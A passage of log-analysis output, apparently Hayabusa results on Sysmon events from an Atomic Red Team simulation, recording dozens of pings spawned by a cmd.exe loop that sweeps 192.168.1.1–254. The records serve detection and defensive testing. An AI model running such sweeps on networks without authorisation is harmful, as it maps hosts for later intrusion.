C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5612 | PGUID: 747F3D96-D91F-5D31-0000-0010640B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:16.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.83 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2288 | PGUID: 747F3D96-D920-5D31-0000-00104E0E3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:16.584 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.84 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1684 | PGUID: 747F3D96-D920-5D31-0000-0010A6183500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:17.041 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.85 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1060 | PGUID: 747F3D96-D921-5D31-0000-0010921B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:17.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.86 | Process: 
C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3744 | PGUID: 747F3D96-D921-5D31-0000-00107C1E3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:18.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.87 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3068 | PGUID: 747F3D96-D922-5D31-0000-001066213500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:18.509 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.88 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6312 | PGUID: 747F3D96-D922-5D31-0000-001063243500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:18.990 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.89 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3116 | PGUID: 747F3D96-D922-5D31-0000-001053273500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:19.541 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 
1 -w 100 192.168.1.90 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D923-5D31-0000-00103D2A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:20.006 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.91 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1020 | PGUID: 747F3D96-D924-5D31-0000-0010272D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:20.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.92 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2292 | PGUID: 747F3D96-D924-5D31-0000-001024303500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:21.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.93 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D925-5D31-0000-00106C3C3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:21.488 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.94 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5852 | PGUID: 747F3D96-D925-5D31-0000-0010563F3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:22.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.95 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6288 | PGUID: 747F3D96-D926-5D31-0000-00101B483500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:22.542 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.96 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D926-5D31-0000-0010074B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:23.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.97 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 
747F3D96-D927-5D31-0000-0010F24D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:23.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.98 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D927-5D31-0000-0010DC503500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:24.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.99 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D928-5D31-0000-0010C7533500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:24.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.100 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D928-5D31-0000-0010B1563500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:25.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.101 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | 
LID: 0x50951 | PID: 7152 | PGUID: 747F3D96-D929-5D31-0000-00109D593500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:25.529 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.102 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D929-5D31-0000-00108A5C3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:26.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.103 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6084 | PGUID: 747F3D96-D929-5D31-0000-0010765F3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:26.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.104 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3700 | PGUID: 747F3D96-D92A-5D31-0000-001062623500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:27.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.105 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) 
do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2852 | PGUID: 747F3D96-D92B-5D31-0000-0010296B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:27.493 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.106 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6484 | PGUID: 747F3D96-D92B-5D31-0000-00108D6E3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:28.017 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.107 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5400 | PGUID: 747F3D96-D92C-5D31-0000-00107A713500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:28.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.108 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3452 | PGUID: 747F3D96-D92C-5D31-0000-001072743500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:29.110 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.109 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4468 | PGUID: 747F3D96-D92D-5D31-0000-001068773500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:29.561 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.110 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4320 | PGUID: 747F3D96-D92D-5D31-0000-0010787A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:30.054 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.111 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3952 | PGUID: 747F3D96-D92E-5D31-0000-0010787D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:30.526 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.112 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6148 | PGUID: 747F3D96-D92E-5D31-0000-001091803500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:31.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.113 | Process: C:\Windows\System32\PING.EXE | 
User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3800 | PGUID: 747F3D96-D92F-5D31-0000-00109C833500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:31.476 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.114 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1324 | PGUID: 747F3D96-D92F-5D31-0000-0010478A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:32.005 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.115 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3268 | PGUID: 747F3D96-D92F-5D31-0000-00109A973500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:32.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.116 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1860 | PGUID: 747F3D96-D930-5D31-0000-0010879A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:33.004 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.117 | 
Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4996 | PGUID: 747F3D96-D931-5D31-0000-00108F9D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:33.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.118 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2460 | PGUID: 747F3D96-D931-5D31-0000-0010A9A03500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:33.900 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.119 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6156 | PGUID: 747F3D96-D931-5D31-0000-00105CA63500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:34.490 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.120 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-D932-5D31-0000-001057A93500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:35.031 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.121 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5832 | PGUID: 747F3D96-D933-5D31-0000-001062AC3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:35.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.122 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3684 | PGUID: 747F3D96-D933-5D31-0000-001098AF3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:35.999 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.123 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 208 | PGUID: 747F3D96-D933-5D31-0000-0010B6B23500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:36.510 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.124 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2600 | PGUID: 747F3D96-D934-5D31-0000-0010A3B53500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:36.905 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.125 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2596 | PGUID: 747F3D96-D934-5D31-0000-00106ABE3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:37.449 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.126 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3356 | PGUID: 747F3D96-D935-5D31-0000-001056C13500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:37.947 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.127 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5004 | PGUID: 747F3D96-D935-5D31-0000-001042C43500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:38.514 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.128 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3964 | PGUID: 
